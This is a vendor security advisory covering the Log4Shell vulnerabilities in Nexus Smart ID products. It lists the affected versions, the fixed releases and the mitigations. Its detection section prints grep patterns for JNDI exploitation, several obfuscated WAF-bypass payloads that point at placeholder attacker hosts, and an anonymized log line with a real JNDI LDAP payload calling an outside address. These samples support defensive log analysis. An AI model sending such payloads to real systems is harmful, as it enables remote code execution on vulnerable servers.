Nexus' software components have new names:

Nexus PRIME -> Smart ID Identity Manager
Nexus Certificate Manager -> Smart ID Certificate Manager
Nexus Hybrid Access Gateway -> Smart ID Digital Access component
Nexus Personal -> Smart ID clients

Go to Nexus homepage for overviews of Nexus' solutions, customer cases, news and more.


General information

This message contains information related to the recently published remote code execution (RCE) vulnerability affecting Log4j: https://www.randori.com/blog/cve-2021-44228/ 

Log4j2 is an open-source, Java-based logging framework commonly incorporated into Apache web servers. According to public sources, Chen Zhaojun of Alibaba officially reported a Log4j2 remote code execution (RCE) vulnerability to Apache on Nov. 24, 2021.

This critical vulnerability, subsequently tracked as CVE-2021-44228 (aka “Log4Shell”), impacts all versions of Log4j2 from 2.0-beta9 to 2.14.1.

Further on, these additional CVEs was also reported for Log4j, CVE-2021-45046 for the 2.15 version, as well as CVE-2021-45105 for 2.16.

The Nexus Security team is currently investigating the impact of the Log4j remote code execution vulnerability (CVE-2021-44228), (CVE-2021-45046), (CVE-2021-45105) and determining the possible impact on our products.

Information about the update

Refer to the table in section "Nexus components" for the latest information for the components.

CVE-2021-45105

There was a new vulnerability (CVE-2021-45105) detected in Log4j, which has been fixed with version Log4j 2.17. Nexus has investigated the issue, and currently we see no indication that Nexus products are affected by this vulnerability.

Customers who still want to update to the latest Log4j version 2.17, can download the corresponding version from the official Log4j website, and replace the version 2.16 JAR file with the new one.

Nexus will update Log4j again with the next regular release of the corresponding product versions.

Releases with fixed versions of the affected components:

  • Smart ID version 21.10.1 This version contains a fix for both CVE-2021-44228 and CVE-2021-45046, as it is packaged with Log4j 2.16.
    You can find this version on the support portal, and release notes here: Release note Smart ID 21.10.1

  • Smart ID version 21.04.6 This version contains a fix for both CVE-2021-44228 and CVE-2021-45046, as it is packaged with Log4j 2.16.
    You can find this version on the support portal, and release notes here: Release note Smart ID 21.04.6

  • Smart ID version 20.11.3 This version contains a fix for both CVE-2021-44228 and CVE-2021-45046, as it is packaged with Log4j 2.16.
    You can find this version on the support portal, and release notes here: Release note Smart ID 20.11.3

  • Digital Access version 6.1.2 – This version contains a fix for both CVE-2021-44228 and CVE-2021-45046, and it is packaged with Log4j 2.17.
    You can find this version on the support portal, and release notes here: Release note Digital Access component 6.1.2

  • Digital Access version 6.1.1 This version contains a fix for both CVE-2021-44228 and CVE-2021-45046, as it is packaged with Log4j 2.16.
    You can find this version on the support portal, and release notes here: Release note Digital Access component 6.1.1

  • Smart ID Identity Manager (PRIME) version 3.12.14 – This version contains a fix for both CVE-2021-44228 and CVE-2021-45046, as it is packaged with Log4j 2.16.
    You can find this version on the support portal, and release notes here: Release note Smart ID Identity Manager 3.12.14

  • Smart ID Identity Manager (PRIME) version 3.11.5 – This version contains a fix for both CVE-2021-44228 and CVE-2021-45046, as it is packaged with Log4j 2.16.
    You can find this version on the support portal, and release notes here: Release note Smart ID Identity Manager 3.11.5

  • Smart ID Identity Manager (PRIME) version 3.10.30 – This version contains a fix for both CVE-2021-44228 and CVE-2021-45046, as it is packaged with Log4j 2.16.
    You can find this version on the support portal, and release notes here: Release note Smart ID Identity Manager 3.10.30


We will keep on updating this page on a regular basis, as soon as there is new information available.

Our engineering teams are working hard to develop fixes and ensuring that we provide the best possible fixes for you.

Since Friday evening, 2021-12-10, Nexus has a dedicated incident team synchronizing our actions after the announcement of the Log4j CVE. This is to be able to ensure that we work as effectively as possible during these first intensive days after such a critical CVE is released in the wild.

We can see tests and probing being performed on several customers, including our own SaaS environments, but have not yet seen or heard of any case where an attack on our products has actually been successful.

Factors like WAF (Web Application Firewall), Egress control (Firewall or other method of controlling what traffic is allowed from the inside and our) could be mitigation factors in some cases.

Nexus SaaS customers

If you are a Nexus SaaS (Software as a Service) customer, the mitigation and patching is performed by the SaaS delivery team. At this point in time, we have taken all necessary steps, and are awaiting our internal engineering teams to provide a permanent fix. We are monitoring the situation to further analyze any new changes to the CVE and the potential methods of exploiting it, to ensure security and stability in the environment. 
 
Currently, the team is performing deeper analysis of attack patterns, to be able to tweak our service platform even further, for any future adaptations of this vulnerability. Our SaaS services are monitored 24/7/365 by our on-call rotation, and we have also updated our monitoring and routines to deal with this specific CVE. 

Nexus components

This list contains the components from Nexus, and their respective affected versions.

Component

Affected versions

Comment

Smart ID Certificate Manager

None of the supported versions are affected

Does not use Log4j

Nexus OCSP Responder

None of the supported versions are affected

Does not use Log4j

Nexus Timestamp Server

None of the supported versions are affected

Does not use Log4j

Smart ID Desktop / Mobile App

None of the supported versions are affected

Does not use Log4j

Nexus Card SDK

None of the supported versions are affected

Does not use Log4j

Smart ID Physical Access

None of the supported versions are affected

Does not use Log4j

Smart ID Digital Access (previously named Hybrid Access Gateway – HAG)

Versions => 6.0.5 and later could be affected if customers have configured Digital Access to use a syslog server for logging.

When using syslog, Digital Access uses Log4j logging. We are still investigating this, as we have yet not been able to reproduce a successful attack.

For all other purposes, an internal logging framework is used. This framework is not affected by CVE-2021-44228.

  • Fix version 6.1.2 (Digital Access), released 2021-12-22
  • Fix version 6.1.1 (Digital Access), released 2021-12-16

Versions < 6.0.5 are not affected

All versions of HAG are not affected

Recommendation is to implement mitigation as described below, or upgrade to 6.1.1.

Smart ID Identity Manager / PRIME

EOL WAR versions:

3.5
3.6

Supported WAR versions:

3.7
3.8
3.9
3.10
3.11
3.12

Supported Docker versions:

20.06
20.11
21.04
21.10

  • Fix version 21.10.1 (Smart ID), released 2021-12-16
  • Fix version 21.04.6 (Smart ID), released 2021-12-16
  • Fix version 20.11.3 (Smart ID), released 2021-12-17

  • Fix version 3.12.14 (PRIME), released 2021-12-17
  • Fix version 3.11.5 (PRIME), released 2021-12-17
  • Fix version 3.10.30 (PRIME), released 2021-12-16

Recommendation is to implement mitigation as described below, or upgrade.

Smart ID Self-Service

Supported WAR versions:

3.9
3.10
3.11
3.12

Supported Docker versions:

20.06
20.11
21.04
21.10

Recommendation is to implement mitigation as described below, until Nexus has provided an official fix

Smart ID Messaging component - Hermod

None of the supported versions are affected

Hermod is shipped with Log4j framework, in this case log4j-api, which is not affected. Hermod uses logback for its logging, and not Log4j. See reference in documentation: Link and: Link

Customers who are still using the older WAR versions of Hermod, could have configured Log4j on their own. Please be aware of this and double-check your configuration.

If you have made any customized adaptations of your own logging, you need to investigate this with your teams internally. The information in this list is based on how Nexus ship our released versions to you.

Mitigation

Until a patch can be provided, we recommend that you follow the information available on the CVE.

Nexus engineering teams are working on a permanent fix for our products and aim to get this available to you as soon as possible, this will then be based on Log4j 2.16

Apache advises that if patching is not immediately possible, there is currently only one mitigation available, that is the recommended one by Apache. See this page for reference: Apache security page

MitigationsApplicable versions
  1. Remove JndiLookup class from the classpath.
    To do this, enter this command:

    zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
All Log4j 2 versions

This will provide a workaround for CVE-2021-44228
  • In PatternLayout in the logging configuration, replace Context Lookups like ${ctx:loginId} or $${ctx:loginId} with Thread Context Map patterns (%X, %mdc, or %MDC).

  • You can also, instead of bullet 1, do like this:
    In the configuration, remove references to Context Lookups like ${ctx:loginId} or $${ctx:loginId} where they originate from sources external to the application such as HTTP headers or user input.
All Log4j versions prior to 2.17

This will provide a workaround for CVE-2021-45105

Performing this will prevent the vulnerability from working, as your application server will not perform the callback needed for the vulnerability to be successful.

Further information

As an additional recommendation, we highly encourage you to investigate all other application servers (non Nexus software) you might have, that could use Log4j.

We also encourage you to perform log analysis of your application and network traffic and to take appropriate steps for mitigation.

This list contains some of the known applications that could be vulnerable to this CVE:

  • Apache Struts
  • Apache Solr
  • Apache Druid
  • Apache Flink
  • ElasticSearch
  • Flume
  • Apache Dubbo
  • Logstash
  • Kafka
  • Spring-Boot-starter-log4j2

Log4j RCE exploitation detection

You can use these commands and rules to search for exploitation attempts against Log4j RCE vulnerability CVE-2021-44228.

The below commands are examples, and you will need to point the commands to your respective application log folder.

Nexus does not have access to the systems hosted by you, the customer, (except for Nexus SaaS Services, where this is handled by the service organization) and it is vital that you perform investigations of your own to make sure that you have not been breached and is subject to any form of data breach.

Grep / Zgrep

This command searches for exploitation attempts in uncompressed files in the folder /var/log and all sub folders:

sudo egrep -i -r '\$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+' /var/log

This command searches for exploitation attempts in compressed files in the folder /var/log and all sub folders:

sudo find /var/log -name \*.gz -print0 | xargs -0 zgrep -E -i '\$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+'

Grep / Zgrep - Obfuscated variants

These commands cover even the obfuscated variants but lack the file name in a match. 

This command searches for exploitation attempts in uncompressed files in the folder /var/log and all sub folders:

sudo find /var/log/ -type f -exec sh -c "cat {} | sed -e 's/\${lower://'g | tr -d '}' | egrep -i 'jndi:(ldap[s]?|rmi|dns):'" \;

This command searches for exploitation attempts in compressed files in the folder /var/log and all sub folders:

sudo find /var/log/ -name "*.gz" -type f -exec sh -c "zcat {} | sed -e 's/\${lower://'g | tr -d '}' | egrep -i 'jndi:(l

Yara file

YARA rules are a way of identifying malware (or other files) by creating rules that look for certain characteristics. YARA was originally developed by Victor Alvarez of Virus total and is mainly used in malware research and detection. It was developed with the idea to describe patterns that identify particular strains or entire families of malware.

On this GitHub page, you can find a YARA file that is tailormade for this CVE (CVE-2021-44228)

Credit for the Grep and Yara files goes to Neo23x0 / Florian Roth. We share these with you, under the Detection Rule license (DRL) 1.1

WAF bypass methods

Many WAF (Web Application Firewall) vendors and providers have implemented WAF rules to be able to stop the traffic before it can reach the application itself.

There are methods to bypass some of the WAF rules, and these are some examples of methods that we would encourage you to search for in your logs, to see if your WAF might not have caught these requests.

Note: asdasd and xxxxxx are only examples, this will be the attackers url in a real scenario.

Example
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}

This is an example of how this could look like in an application log (real request, anonymized):

2021-12-12 05:54:07 0 ip.number.ip.ip 5f7288ab7f41d805 - - - endpoint.ip.number:443 https - GET / ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://111.111.1111.111:12344/Basic/Command/
Base64/V2Ugd291bGQgbm90IHBvc3QgYW55dGhpbmcgbWFsaWNpb3VzIGhlcmUsIHNvIHRoaXMgaXMganVzdCBh
biBleGFtcGxlIHRleHQgY29udmVydGVkIHRvIEJBU0U2NCA6KQ== } host:ip.number.ip.ip:443 404

Disclaimer

Nexus has made effort to make this information accurate and reliable. However, the information, including the recommendations provided by Nexus, is provided "as is" without warranty of any kind. Nexus disclaims all warranties, either expressed or implied and Nexus shall in no event be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, which may arise as a result of your use, or inability to use, this information.

Latest update date of this article

2021-12-22 15:40 CET


Table of contents